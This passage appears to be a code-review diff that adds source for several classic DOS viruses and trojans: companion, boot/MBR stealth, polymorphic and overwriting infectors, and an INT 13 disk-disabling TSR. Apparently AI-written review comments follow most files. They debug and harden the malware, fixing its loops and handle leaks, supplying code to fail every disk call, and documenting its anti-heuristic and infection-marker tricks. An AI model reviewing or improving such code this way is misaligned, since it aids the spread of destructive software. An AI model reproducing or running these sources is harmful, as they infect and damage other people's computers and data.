;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Infect_file: ;create companion routine
|
||||
|
||||
mov dx,OFFSET FILE_CREATE ;contains name of "companion"
|
||||
xor cx,cx
|
||||
mov ah,3ch ;construct file
|
||||
int 21h
|
||||
jc EXIT
|
||||
|
||||
;Write virus to companion file
|
||||
xchg bx,ax
|
||||
mov cx,(OFFSET END_OF_CODE - OFFSET START) ;virus length
|
||||
mov dx,OFFSET START
|
||||
mov ah,40h ;write to file function
|
||||
int 21h ;do it
|
||||
|
||||
;Close file
|
||||
mov ah,3eh ;assumes bx still has file handle
|
||||
int 21h
|
||||
|
||||
;Change attributes
|
||||
mov dx,OFFSET FILE_CREATE ;of created file to
|
||||
mov cx,3 ;(1) read only and (2) hidden
|
||||
mov ax,4301h
|
||||
int 21h
|
||||
jmp prepare_command
|
||||
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
;...findnext...
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
find_next:
|
||||
mov ah, 4fh ;find next...
|
||||
int 21h
|
||||
jmp store_name
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Prepare_command:
|
||||
|
||||
cld
|
||||
mov di,OFFSET FILE_CLONE
|
||||
mov al,0
|
||||
mov cx,12
|
||||
repne scasb ;find the end of string \0
|
||||
|
||||
mov al,0Dh ;<CR>
|
||||
stosb ;replace \0 with a <CR>
|
||||
|
||||
mov ax,12 ;store length of the command
|
||||
sub ax,cx
|
||||
mov CMD_LEN, al
|
||||
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
Exit:
|
||||
;Run the original program
|
||||
mov si, OFFSET MY_CMD
|
||||
int 2Eh ;Pass command to command
|
||||
;interpreter for execution
|
||||
mov ax,4C00H ;Exit to DOS
|
||||
int 21h
|
||||
|
||||
|
||||
END_OF_CODE = $
|
||||
|
||||
STACK_HERE EQU END_OF_CODE + 512
|
||||
|
||||
CSEG ENDS
|
||||
END START
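Review bot: `find_next` (the `mov ah, 4fh` / `int 21h` / `jmp store_name` sequence) never tests the carry flag, so when DOS reports no more files the code jumps back to `Store_name` and reprocesses the stale DTA entry; if that file's companion already exists, the `jnc find_next` in `Check_file` sends it straight back, which loops forever. A `jc EXIT` immediately after that `int 21h` matches how `Read_dir` already handles the find-first failure. The handle returned by the 3D00h open in `Check_file` is also never closed before looping, so each already-infected file costs one handle for the rest of the run; closing it (handle into BX, `mov ah,3eh`, `int 21h`) before going to `find_next` would fix that. Both points are in code fully inside the hunk.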
|
||||
|
|
@ -0,0 +1,255 @@
|
|||
; Trick Virii (446 bytes length!)
|
||||
; (l) 1997 copyleft by Psychomancer // SPS.
|
||||
; 2:454/7.64@FidoNet
|
||||
|
||||
; MBR/BOOT/EXE stealth hard-removable infector.
|
||||
; Thanx 2 Nutcracker 4 "cryp_sec" algorithm.
|
||||
|
||||
; WARNING! 4 compile tasm /m option needed!
|
||||
; DON'T RUN IT! ONLY 4 DEMONSTRATION!
|
||||
|
||||
model tiny
|
||||
.code
|
||||
|
||||
begin: mov cx,decryp_len
|
||||
call $+3
|
||||
xor ah,ah
|
||||
int 15h ; antiheuristic trick (must b CF=1 on return)
|
||||
pop si
|
||||
sbb al,al ; <- set AL in zero manual on 1st execute!
|
||||
; (in DEBUG)
|
||||
lea di,[si+decryp_begin-6]
|
||||
xor_decryp: sub al,0
|
||||
xor_mask equ $-begin-1
|
||||
xor cs:[di],al ; decrypt selfbody
|
||||
inc di
|
||||
loop xor_decryp
|
||||
decryp_begin equ $-begin
|
||||
decryp_code: sub si,6
|
||||
jz file_start ; goto if run from file
|
||||
mov bx,7c00h
|
||||
xor di,di
|
||||
mov ds,di
|
||||
mov ss,di
|
||||
mov sp,bx
|
||||
dec word ptr ds:[413h] ; decrease TOM
|
||||
mov ax,[di+3*4]
|
||||
mov [si+rom_mask],ax ; store crypt mask
|
||||
int 12h
|
||||
mov cx,206h
|
||||
mov [si+offrand],ch ; set in 2
|
||||
shl ax,cl
|
||||
mov es,ax
|
||||
push ss bx
|
||||
rep movsb ; move selfbody 2 new segm
|
||||
push es
|
||||
mov es,cx
|
||||
mov cl,go_after_move
|
||||
push cx
|
||||
retf
|
||||
|
||||
;-----------------------------------------------;
|
||||
|
||||
file_start: mov ax,0deadh
|
||||
int 13h ; we present in memory?
|
||||
jnc file_exit
|
||||
mov ah,13h
|
||||
int 2fh
|
||||
mov ax,259ah
|
||||
int 21h ; set int 9ah on ROM int 13h
|
||||
mov ah,13h
|
||||
int 2fh
|
||||
push cs
|
||||
pop es
|
||||
mov ax,1600h
|
||||
int 2fh
|
||||
cmp ax,1600h ; we execute under windoze?
|
||||
mov al,0
|
||||
org $-1
|
||||
jnc $ ; no - will b crypt direntries
|
||||
org $-1
|
||||
je no_win_run
|
||||
mov al,0
|
||||
org $-1
|
||||
jmp $ ; yeah - no crypt direntries
|
||||
org $-1
|
||||
no_win_run: mov cs:cryp_switch,al ; store it
|
||||
lea bx,buffer
|
||||
call copy_2_mbr ; infect mbr on 1st hd
|
||||
file_exit: .exit
|
||||
|
||||
;-----------------------------------------------;
|
||||
|
||||
go_after_move equ $-begin
|
||||
mov si,13h*4
|
||||
mov di,9ah*4
|
||||
movsw ; set int 9ah on ROM int 13h
|
||||
movsw
|
||||
mov word ptr [si-4],offset int_13h_entry ; hook int 13h
|
||||
mov [si-2],ax
|
||||
cmp byte ptr [bx],0ebh ; we loading from floppy boot?
|
||||
jne load_from_mbr
|
||||
call copy_2_mbr ; yeah - infect mbr on 1st hd
|
||||
load_from_mbr: mov cl,11h ; read original mbr code
|
||||
read_sec: mov dx,80h
|
||||
mov ax,201h
|
||||
int 9ah
|
||||
retf ; exit
|
||||
|
||||
;-----------------------------------------------;
|
||||
|
||||
int_13h_entry: mov cs:store_fn,ah
|
||||
mov cs:store_sc,al
|
||||
cmp ax,0deadh ; our function?
|
||||
je exit_13h_retf
|
||||
int 9ah ; call old int 13h
|
||||
pushf
|
||||
push ax si di ds dx cx es
|
||||
pop ds
|
||||
jc exit_13h ; exit if error
|
||||
mov ax,0
|
||||
store_fn = byte ptr $-2
|
||||
cmp dl,80h ; non-1st hd?
|
||||
je hd_access
|
||||
cmp al,3 ; write?
|
||||
jne exit_13h
|
||||
cmp dx,cx ; floppy?
|
||||
ja no_boot_write
|
||||
dec cx ; boot?
|
||||
jnz no_boot_write
|
||||
mov word ptr [bx],3eebh ; yeah - infect floppy boot
|
||||
jmp copy_2_boot
|
||||
no_boot_write: mov ax,[bx]
|
||||
not ax
|
||||
mul ah
|
||||
sub ax,72bah ; 'MZ' or 'ZM' in buffer?
|
||||
jnz exit_13h
|
||||
int 1ah ; get timer tick
|
||||
mov cl,0 ; randomize
|
||||
offrand equ $-begin-1
|
||||
xchg dx,ax
|
||||
cwd
|
||||
idiv cx ; get random
|
||||
and dx,dx
|
||||
jnz exit_13h
|
||||
mov [bx+6],dx ; set number of relocation on zero
|
||||
mov word ptr [bx+8],4 ; length of header
|
||||
mov [bx+14h],dx ; set cs:ip on zero (i.e. on trick ;)
|
||||
mov [bx+16h],dx
|
||||
rol byte ptr cs:offrand,1 ; change randomize
|
||||
copy_2_boot: lea di,[bx+40h]
|
||||
call crypt_self ; self encrypt and move 2 buffer
|
||||
pop cx dx
|
||||
call write_sec ; write sector on disk
|
||||
jmp exit_13h_pop
|
||||
hd_access: cmp al,2 ; read?
|
||||
jne no_stealth
|
||||
and dh,dh ; head is zero?
|
||||
jnz hd_read
|
||||
dec cx ; cyl/sec is 0/1?
|
||||
jnz hd_read
|
||||
mov cl,11h
|
||||
push cs
|
||||
call read_sec ; read original mbr
|
||||
exit_13h: pop cx dx
|
||||
exit_13h_pop: pop ds di si ax
|
||||
popf
|
||||
exit_13h_retf: retf 2 ; exit from int 13h
|
||||
no_stealth: cmp al,3 ; write?
|
||||
jne exit_13h
|
||||
hd_read: mov cs:cryp_or_decryp,0 ; set "js"
|
||||
org $-1
|
||||
js $
|
||||
org $-1
|
||||
call crypt_sec ; encrypt direntries in buffer
|
||||
cryp_switch label byte
|
||||
jnc decrypt_sec ; goto if direntries is not found
|
||||
pop cx ; restore cyl/sec
|
||||
push cx
|
||||
mov ah,3
|
||||
int 9ah ; re-write crypted direntries
|
||||
decrypt_sec: lea ax,exit_13h ; decrypt direntries in buffer
|
||||
push ax
|
||||
|
||||
;-----------------------------------------------;
|
||||
|
||||
crypt_sec: mov cx,0 ; number of sector
|
||||
store_sc = byte ptr $-2
|
||||
push cx
|
||||
mov si,bx
|
||||
scan_next_sec: push cx
|
||||
mov cl,10h ; number of direntries on one sector
|
||||
scan_next_elem: push cx si
|
||||
mov cl,0bh
|
||||
next_char_name: lodsb
|
||||
cmp al,' ' ; check if filename
|
||||
jb get_next_elem
|
||||
loop next_char_name
|
||||
lodsb
|
||||
test al,11001000b ; check if attribute
|
||||
jnz get_next_elem
|
||||
mov cl,9
|
||||
next_char_res: lodsb
|
||||
and al,al ; check if normal (not long!) filename
|
||||
jnz get_next_elem
|
||||
loop next_char_res
|
||||
test [si],dl ; already en/decrypted?
|
||||
cryp_or_decryp label byte
|
||||
js get_next_elem
|
||||
xor [si],dl ; en/decrypt direntry
|
||||
mov ax,0 ; mask of crypt
|
||||
rom_mask equ $-begin-2
|
||||
sub ax,[si+1]
|
||||
xor [si+5],ax
|
||||
mov ah,1 ; set bit
|
||||
get_next_elem: pop si cx
|
||||
add si,20h ; get next direntry
|
||||
loop scan_next_elem
|
||||
pop cx ; get next sector
|
||||
loop scan_next_sec
|
||||
inc cs:cryp_or_decryp ; change condition
|
||||
sahf ; store bit on cf
|
||||
pop ax
|
||||
retn
|
||||
|
||||
;-----------------------------------------------;
|
||||
|
||||
crypt_self: push cs
|
||||
pop ds
|
||||
xor si,si
|
||||
in al,40h ; get random mask
|
||||
mov [si+xor_mask],al
|
||||
mov cl,decryp_begin
|
||||
rep movsb ; move unencrypted part
|
||||
mov ah,-1
|
||||
mov cx,decryp_len
|
||||
xor_encryp: sub ah,al
|
||||
movsb
|
||||
xor es:[di-1],ah
|
||||
loop xor_encryp ; move and encrypt selfbody
|
||||
retn
|
||||
|
||||
;-----------------------------------------------;
|
||||
|
||||
copy_2_mbr: mov cx,1
|
||||
push cs
|
||||
call read_sec ; read mbr on 1st hd
|
||||
cmp byte ptr es:[bx],0 ; already infected?
|
||||
org $-1
|
||||
mov cx,0
|
||||
org $-2
|
||||
je already_prs
|
||||
mov cl,11h
|
||||
call write_sec ; store original mbr in 0/0/17
|
||||
mov di,bx
|
||||
call crypt_self ; move and encrypt selfbody
|
||||
inc cx ; cx=1
|
||||
write_sec: mov ax,301h
|
||||
int 9ah ; infect mbr
|
||||
already_prs: retn
|
||||
|
||||
decryp_len equ $-decryp_code
|
||||
len_body equ $-begin
|
||||
buffer label byte
|
||||
|
||||
end begin
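Review bot: The decryptor's initial running key comes from `sbb al,al` after `int 15h` with AH=0 (the "antiheuristic trick" lines at the top of `begin`), so it is only correct when that BIOS call returns with CF=1; on a BIOS or emulator that leaves carry clear for that function the key starts at 0 instead of 0FFh and everything from `decryp_code` onward runs still encrypted. The existing comment states the requirement ("must b CF=1") but not its consequence; I would expand it to `; key must start at 0FFh: CF=1 from INT 15h/AH=0 -> AL=0FFh; CF=0 leaves AL=0 and the body undecrypted`. The `org $-1` / `org $-2` overlays in `copy_2_mbr` are likewise undocumented: the immediate of `cmp byte ptr es:[bx],0` appears to be overwritten by the opcode byte of the following `mov cx,0`, so the "already infected" test compares a single byte of the sector against the virus's first opcode; a comment such as `; immediate patched to 0B9h (first byte of begin) - one-byte infection marker` would spare the next reader from tracing the overlays by hand.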
|
|
@ -0,0 +1,500 @@
|
|||
.model tiny
|
||||
.code
|
||||
.radix 16
|
||||
org 0
|
||||
|
||||
viruslength = (heap - entry)
|
||||
virussizeK = (endvirus - entry + 3ff) / 400
|
||||
virussizepara = (virussizeK)*40
|
||||
|
||||
EXE_ID = 'PS'
|
||||
|
||||
entry:
|
||||
call past
|
||||
next:
|
||||
db 0,"Trigger by Dark Angel of Phalcon/Skism",0Dh,0A
|
||||
db "Utilising Dark Angel's Multiple Encryptor (DAME)",0Dh,0A
|
||||
db 0Dh,0A,0
|
||||
|
||||
checkstub db 72,0FA,0E,1F,0BA,00,0B8,0B8,40,00,8E,0C0,26,81,3E,63
|
||||
|
||||
past: cld
|
||||
pop bp
|
||||
|
||||
mov ax,0cf0
|
||||
mov bx,'DA'
|
||||
int 21
|
||||
cmp bx,'GH'
|
||||
jnz no_trigger
|
||||
trigger:
|
||||
push ds
|
||||
push es
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
xor ax,ax
|
||||
checkagain:
|
||||
lea si,[bp+checkstub-next]
|
||||
mov es,ax
|
||||
xor di,di
|
||||
mov cx,8
|
||||
rep cmpsw
|
||||
jz trigger_it
|
||||
inc ax
|
||||
cmp ax,0a000
|
||||
jb checkagain
|
||||
jmp exit_trigger
|
||||
trigger_it:
|
||||
mov [bp+patch-next],ax
|
||||
mov ds,ax
|
||||
mov byte ptr ds:73,0cbh
|
||||
push bp
|
||||
mov bp,-80
|
||||
jmp short $+2
|
||||
db 09a ; call far ptr
|
||||
dw 1
|
||||
patch dw ?
|
||||
pop bp
|
||||
mov byte ptr ds:73,1f
|
||||
exit_trigger:
|
||||
pop es
|
||||
pop ds
|
||||
jmp short restore
|
||||
|
||||
no_trigger:
|
||||
mov ax,4b90
|
||||
int 21
|
||||
cmp ax,bx
|
||||
jz restore
|
||||
|
||||
push ds
|
||||
push es
|
||||
|
||||
mov ax,ds
|
||||
dec ax
|
||||
mov ds,ax
|
||||
sub word ptr ds:3,virussizepara
|
||||
sub word ptr ds:12,virussizepara
|
||||
mov es,ds:12
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
|
||||
xor di,di
|
||||
lea si,[bp+offset entry-offset next]
|
||||
mov cx,(viruslength + 1)/2
|
||||
rep movsw
|
||||
|
||||
xor ax,ax
|
||||
mov ds,ax
|
||||
sub word ptr ds:413,virussizeK
|
||||
|
||||
mov di,offset oldint21
|
||||
mov si,21*4
|
||||
movsw
|
||||
movsw
|
||||
|
||||
cli
|
||||
|
||||
pushf
|
||||
pushf
|
||||
pop ax
|
||||
or ah,1
|
||||
push ax
|
||||
|
||||
mov ds:1*4+2,es
|
||||
mov word ptr ds:1*4,offset int1_1
|
||||
|
||||
popf
|
||||
|
||||
mov ah,30
|
||||
pushf
|
||||
call dword ptr ds:21*4
|
||||
|
||||
popf
|
||||
|
||||
lds si,dword ptr es:oldint21
|
||||
mov di,si
|
||||
lodsw
|
||||
mov word ptr es:int21patch1,ax
|
||||
lodsw
|
||||
mov word ptr es:int21patch2,ax
|
||||
lodsb
|
||||
mov byte ptr es:int21patch3,al
|
||||
|
||||
push ds ; es:di->int 21 handler
|
||||
push es
|
||||
pop ds ; ds->high segment
|
||||
pop es
|
||||
|
||||
mov al,0ea
|
||||
stosb
|
||||
mov ax,offset int21
|
||||
stosw
|
||||
mov ax,ds
|
||||
stosw
|
||||
sti
|
||||
|
||||
pop es
|
||||
pop ds
|
||||
|
||||
restore:
|
||||
cmp sp,-2
|
||||
jnz restoreEXE
|
||||
restoreCOM:
|
||||
lea si,[bp+readbuffer-next]
|
||||
mov di,100
|
||||
push di
|
||||
movsw
|
||||
movsw
|
||||
ret
|
||||
restoreEXE:
|
||||
mov ax,ds
|
||||
add ax,10
|
||||
add cs:[bp+readbuffer+16-next], ax
|
||||
add ax,cs:[bp+readbuffer+0e-next]
|
||||
mov ss,ax
|
||||
mov sp,cs:[bp+readbuffer+10-next]
|
||||
jmp dword ptr cs:[bp+readbuffer+14-next]
|
||||
|
||||
readbuffer dw 20cdh
|
||||
dw 0bh dup (?)
|
||||
|
||||
int1_1:
|
||||
push bp
|
||||
mov bp,sp
|
||||
push ax
|
||||
|
||||
mov ax, [bp+4] ; get segment
|
||||
cmp ax, cs:oldint21+2
|
||||
jae exitint1
|
||||
mov cs:oldint21+2,ax
|
||||
mov ax, [bp+2]
|
||||
mov cs:oldint21,ax
|
||||
exitint1:
|
||||
pop ax
|
||||
pop bp
|
||||
iret
|
||||
|
||||
int1_2:
|
||||
push bp
|
||||
mov bp,sp
|
||||
push ax
|
||||
|
||||
mov ax,cs
|
||||
cmp ax,[bp+4]
|
||||
jz exitint1
|
||||
|
||||
mov ax,[bp+4]
|
||||
cmp ax,cs:oldint21+2
|
||||
jnz int1_2_restore
|
||||
|
||||
mov ax,[bp+2]
|
||||
cmp ax,cs:oldint21
|
||||
jb int1_2_restore
|
||||
sub ax,5
|
||||
cmp ax,cs:oldint21
|
||||
jbe exitint1
|
||||
int1_2_restore:
|
||||
push es
|
||||
push di
|
||||
cld
|
||||
les di,dword ptr cs:oldint21
|
||||
mov al,0ea
|
||||
stosb
|
||||
mov ax,offset int21
|
||||
stosw
|
||||
mov ax,cs
|
||||
stosw
|
||||
pop di
|
||||
pop es
|
||||
|
||||
and [bp+6],0feff
|
||||
jmp exitint1
|
||||
|
||||
install:
|
||||
mov bx,ax
|
||||
iret
|
||||
int21:
|
||||
cmp ax,4b90
|
||||
jz install
|
||||
|
||||
push ds
|
||||
push di
|
||||
lds di,dword ptr cs:oldint21
|
||||
mov word ptr ds:[di],1234
|
||||
int21patch1 = $ - 2
|
||||
mov word ptr ds:[di+2],1234
|
||||
int21patch2 = $ - 2
|
||||
mov byte ptr ds:[di+4],12
|
||||
int21patch3 = $ - 1
|
||||
pop di
|
||||
pop ds
|
||||
|
||||
cld
|
||||
|
||||
cmp ax,4b00
|
||||
jz infect
|
||||
|
||||
exitint21:
|
||||
push ds
|
||||
push ax
|
||||
|
||||
xor ax,ax
|
||||
mov ds,ax
|
||||
cli
|
||||
mov word ptr ds:1*4,offset int1_2
|
||||
mov ds:1*4+2,cs
|
||||
sti
|
||||
|
||||
pushf
|
||||
pop ax
|
||||
or ah,1
|
||||
push ax
|
||||
popf
|
||||
pop ax
|
||||
pop ds
|
||||
db 0ea
|
||||
oldint21 dw 0, 0
|
||||
|
||||
callint21:
|
||||
pushf
|
||||
call dword ptr cs:oldint21
|
||||
ret
|
||||
|
||||
already_infected:
|
||||
pop dx
|
||||
pop cx
|
||||
mov ax,5701
|
||||
call callint21
|
||||
|
||||
mov ah,3e
|
||||
call callint21
|
||||
exitnoclose:
|
||||
mov ax,4301
|
||||
pop dx
|
||||
pop ds
|
||||
pop cx
|
||||
call callint21
|
||||
|
||||
exitinfect:
|
||||
pop es
|
||||
pop ds
|
||||
pop di
|
||||
pop si
|
||||
pop bp
|
||||
pop bx
|
||||
pop dx
|
||||
pop cx
|
||||
pop ax
|
||||
jmp exitint21
|
||||
|
||||
infect:
|
||||
push ax
|
||||
push cx
|
||||
push dx
|
||||
push bx
|
||||
push bp
|
||||
push si
|
||||
push di
|
||||
push ds
|
||||
push es
|
||||
|
||||
mov ax,4300
|
||||
call callint21
|
||||
push cx
|
||||
push ds
|
||||
push dx
|
||||
|
||||
mov ax,4301
|
||||
xor cx,cx
|
||||
call callint21
|
||||
|
||||
mov ax,3d02
|
||||
call callint21
|
||||
jc exitnoclose
|
||||
xchg ax,bx
|
||||
|
||||
mov ax,5700
|
||||
int 21
|
||||
push cx
|
||||
push dx
|
||||
|
||||
mov ah,3f
|
||||
mov cx,18
|
||||
push cs
|
||||
pop ds
|
||||
push cs
|
||||
pop es
|
||||
mov dx,offset readbuffer
|
||||
mov si,dx
|
||||
call callint21
|
||||
jc already_infected
|
||||
|
||||
mov di,offset writebuffer
|
||||
mov cx,18/2
|
||||
|
||||
push si
|
||||
push di
|
||||
|
||||
rep movsw
|
||||
|
||||
pop di
|
||||
pop si
|
||||
|
||||
mov ax,4202
|
||||
xor cx,cx
|
||||
cwd
|
||||
int 21
|
||||
|
||||
cmp word ptr [di],'ZM'
|
||||
jnz infectCOM
|
||||
|
||||
infectEXE:
|
||||
cmp readbuffer+10,EXE_ID
|
||||
go_already_infected:
|
||||
jz already_infected
|
||||
|
||||
mov ds:writebuffer+4,ax
|
||||
mov ds:writebuffer+2,dx
|
||||
|
||||
mov cx,10
|
||||
div cx
|
||||
|
||||
sub ax,ds:writebuffer+8
|
||||
|
||||
mov ds:writebuffer+14,dx
|
||||
mov ds:writebuffer+16,ax
|
||||
|
||||
xchg cx,dx
|
||||
|
||||
mov ds:writebuffer+0e,ax
|
||||
mov ds:writebuffer+10,EXE_ID
|
||||
|
||||
mov al,10b
|
||||
jmp finishinfect
|
||||
|
||||
infectCOM: ; si = readbuffer, di = writebuffer
|
||||
push ax
|
||||
|
||||
mov cx,4
|
||||
xor dx,dx
|
||||
check_infection_loop:
|
||||
lodsb
|
||||
add dl,al
|
||||
loop check_infection_loop
|
||||
|
||||
pop ax
|
||||
|
||||
or dl,dl
|
||||
jz go_already_infected
|
||||
|
||||
mov dx,18
|
||||
cmp ax,dx
|
||||
jnb no_fixup_com
|
||||
|
||||
mov ax,4200
|
||||
xor cx,cx
|
||||
int 21
|
||||
no_fixup_com:
|
||||
mov cx,ax
|
||||
inc ch ; add cx,100
|
||||
sub ax,3
|
||||
push ax
|
||||
mov al,0e9
|
||||
stosb
|
||||
pop ax
|
||||
stosw
|
||||
add al,ah
|
||||
add al,0e9
|
||||
neg al
|
||||
stosb
|
||||
|
||||
mov al,11b
|
||||
finishinfect:
|
||||
cbw
|
||||
; ax = bitmask
|
||||
; bx = start decrypt in carrier file
|
||||
; cx = encrypt length
|
||||
; dx = start encrypt in virus
|
||||
; si = buffer to put decryption routine
|
||||
; di = buffer to put encryption routine
|
||||
push bx
|
||||
|
||||
xchg cx,bx
|
||||
|
||||
xor si,si
|
||||
mov di,offset copyvirus
|
||||
mov cx,(heap-entry+1)/2
|
||||
rep movsw
|
||||
|
||||
push ax
|
||||
call rnd_init_seed
|
||||
pop ax
|
||||
|
||||
mov dx,offset copyvirus
|
||||
mov cx,viruslength
|
||||
mov si,offset _decryptbuffer
|
||||
mov di,offset _encryptbuffer
|
||||
call dame
|
||||
|
||||
push cx
|
||||
|
||||
cmp ds:writebuffer,'ZM'
|
||||
jnz no_fix_header
|
||||
|
||||
mov dx,ds:writebuffer+2
|
||||
mov ax,ds:writebuffer+4
|
||||
add cx,viruslength
|
||||
add ax,cx
|
||||
adc dx,0
|
||||
mov cx,200
|
||||
div cx
|
||||
or dx,dx
|
||||
jz nohiccup
|
||||
inc ax
|
||||
nohiccup:
|
||||
mov ds:writebuffer+4,ax
|
||||
mov ds:writebuffer+2,dx
|
||||
no_fix_header:
|
||||
call di
|
||||
pop cx
|
||||
|
||||
pop bx
|
||||
|
||||
mov ah,40
|
||||
mov dx,offset _decryptbuffer
|
||||
call callint21
|
||||
|
||||
mov ah,40
|
||||
mov cx,viruslength
|
||||
mov dx,offset copyvirus
|
||||
call callint21
|
||||
|
||||
mov ax,4200
|
||||
xor cx,cx
|
||||
cwd
|
||||
int 21
|
||||
|
||||
mov ah,40
|
||||
mov cx,18
|
||||
mov dx,offset writebuffer
|
||||
call callint21
|
||||
jmp already_infected
|
||||
|
||||
vars = 0
|
||||
include dame.asm
|
||||
|
||||
heap:
|
||||
vars = 1
|
||||
include dame.asm
|
||||
|
||||
writebuffer dw 0c dup (?)
|
||||
_encryptbuffer: db 80 dup (?)
|
||||
_decryptbuffer: db 180 dup (?)
|
||||
copyvirus db viruslength dup (?)
|
||||
db 20 dup (?)
|
||||
endvirus:
|
||||
|
||||
end entry
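Review bot: Inside `infect`, some DOS calls bypass the `callint21` helper and issue `int 21` directly — the `mov ax,5700` timestamp read and the `4202`/`4200` seeks — while the open, read, write, close and attribute calls all go through `callint21`. The helper calls the traced-down entry in `oldint21` directly, whereas a raw `int 21` goes through the current vector chain, so any other handler on that vector sees only the timestamp read and the seeks; the inconsistency is observable and looks accidental. Replacing each of those `int 21` with `call callint21` makes the routine uniform, or if the direct calls are intentional a comment at the first one should say why. The tunneling itself (`int1_1` recording the lowest segment reached during the AH=30 call) also deserves a header comment stating that `oldint21` ends up pointing at the lowest-segment handler on the chain, since nothing in the listing says so.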
|
||||
|
|
@ -0,0 +1,17 @@
|
|||
;22 Byte Trivial Virus
|
||||
;Use WASM to assemble
|
||||
|
||||
org 100h
|
||||
|
||||
db '*.*',0
|
||||
|
||||
mov ah,4eh
|
||||
Again
|
||||
mov dx,si
|
||||
int 21h
|
||||
mov ah,3ch
|
||||
mov dx,9eh
|
||||
int 21h
|
||||
xchg bx,ax
|
||||
mov ah,40h
|
||||
jmps Again
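Review bot: The find-first at the first `int 21h` has no carry check, so in a directory with no match the code still goes on to create and write a file named by whatever happens to be at DTA offset 9Eh, and because nothing in the loop issues find-next (AH=4Fh) or closes the handle, every pass recreates and truncates the same first match until the handle table is exhausted. The listing is deliberately minimal, so rather than change it I would state that in the header: `; no error checks: never calls find-next, never closes handles; overwrites the first *.* match repeatedly`. Note also that the `db '*.*',0` sits at the COM entry point and is executed as code before `mov ah,4eh`; it presumably decodes to a harmless instruction on 8086, but that should be confirmed rather than assumed.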
|
|
@ -0,0 +1,69 @@
|
|||
;*****************************************************************************
|
||||
; The High Evolutionary's INT 13 Trojan
|
||||
;*****************************************************************************
|
||||
;
|
||||
; Development Notes:
|
||||
; (Dec.1O.9O)
|
||||
;
|
||||
; Well, I was screwing around with TSR's the other day and I got the idea,
|
||||
; "Hmm. I wonder what would happen if you negated INT 13..." This trojan/TSR
|
||||
; program answers my query.
|
||||
;
|
||||
; It's really a big mess. You can't access any file on the directory, you can't
|
||||
; DIR anything, can't TYPE anything, I think the only thing you can do is
|
||||
; DEL which is handled by INT 21.
|
||||
;
|
||||
; Well, in any event, put this routine in any nifty source code you see and
|
||||
; then compile it... It will confuse the fuck out of any 100% "Lame" user.
|
||||
;
|
||||
; Have fun...
|
||||
;
|
||||
; -= The High Evolutionary =-
|
||||
;
|
||||
;*****************************************************************************
|
||||
; Copyright (C) 199O by The RABID Nat'nl Development Corp.
|
||||
;*****************************************************************************
|
||||
|
||||
code segment
|
||||
assume cs:code,ds:code
|
||||
org 100h
|
||||
|
||||
start: jmp init_vectors
|
||||
|
||||
mesg db 'INT 13 Trojan by The High Evolutionary'
|
||||
crud db '(C) 199O by RABID Nat''nl Development Corp.'
|
||||
crap dd ?
|
||||
|
||||
program proc far
|
||||
|
||||
assume cs:code,ds:nothing
|
||||
|
||||
mov ax,4c00h ; Terminate Program with exit code 00
|
||||
int 21h ; Call DOS
|
||||
|
||||
program endp
|
||||
|
||||
;
|
||||
; The TSR initialization shit happens here...
|
||||
;
|
||||
|
||||
init_vectors proc near
|
||||
|
||||
assume cs:code,ds:code
|
||||
|
||||
mov ah,35h ; ask for int vector
|
||||
mov al,13h ; intercept INT 13
|
||||
int 21h ; Call DOS
|
||||
mov word ptr crap,bx
|
||||
mov word ptr crap[2],es
|
||||
mov ah,25h ; set int value
|
||||
mov al,13h ; set for INT 13
|
||||
mov dx,offset program ; Tell the TSR what to do when accessed
|
||||
int 21h ; Call DOS
|
||||
mov dx,offset init_vectors ; Load in this segment into DX
|
||||
int 27h ; Make the sucker in DX TSR...
|
||||
|
||||
init_vectors endp
|
||||
|
||||
code ends
|
||||
end start
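Review bot: The replacement INT 13h handler at `program` neither services nor chains the request — it calls DOS function 4Ch from inside the BIOS disk-interrupt context, where DOS is not generally re-entrant, so the effect is an undefined state rather than the clean "negation" the header describes, and the vector saved in `crap` is never used to chain or to restore on exit. If the intent is simply to fail every disk call, returning from the hook with an error is the defined way to do it: `mov ah,1` / `stc` / `retf 2`. Whichever is chosen, `program` should carry a comment stating that it is an interrupt handler and what it returns to its caller, and `init_vectors` should note that `int 27h` keeps `offset init_vectors` bytes resident, i.e. everything up to but excluding the installer itself.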
|
|
@ -0,0 +1,260 @@
|
|||
; Senast „ndrad 891213.
|
||||
;
|
||||
; L„gger gamla bootsectorn p† sida 1, sp†r 0, sector 3.
|
||||
; sida 0, sp†r 0, sector 7 p† HD.
|
||||
|
||||
|
||||
Code Segment
|
||||
Assume cs:Code
|
||||
Org 0000h
|
||||
|
||||
Main Proc Far
|
||||
db 0EAh,05h,00h,0C0h,07h
|
||||
|
||||
jmp Near Ptr Init ; Hoppa f”rbi variabler och nya int13h
|
||||
|
||||
|
||||
; Variabler
|
||||
|
||||
Old13h dd 0 ; Gamla vectorn till diskfunktionerna.
|
||||
|
||||
TmpVec dd 0 ; Tempor„r vec. vid „ndring av int 13.
|
||||
|
||||
BootPek dw 0003h,0100h
|
||||
|
||||
; Slut p† variabler
|
||||
|
||||
|
||||
|
||||
Int13h Proc Near
|
||||
push ds
|
||||
push ax
|
||||
push bx
|
||||
|
||||
cmp dl,00h ; Drive A
|
||||
jne Exit
|
||||
|
||||
cmp ah,02h
|
||||
jb Exit
|
||||
cmp ah,04h
|
||||
ja Exit ; Kolla s† att func. 2-4
|
||||
|
||||
sub ax,ax
|
||||
mov ds,ax
|
||||
mov bx,043Fh ; Motor status byte.
|
||||
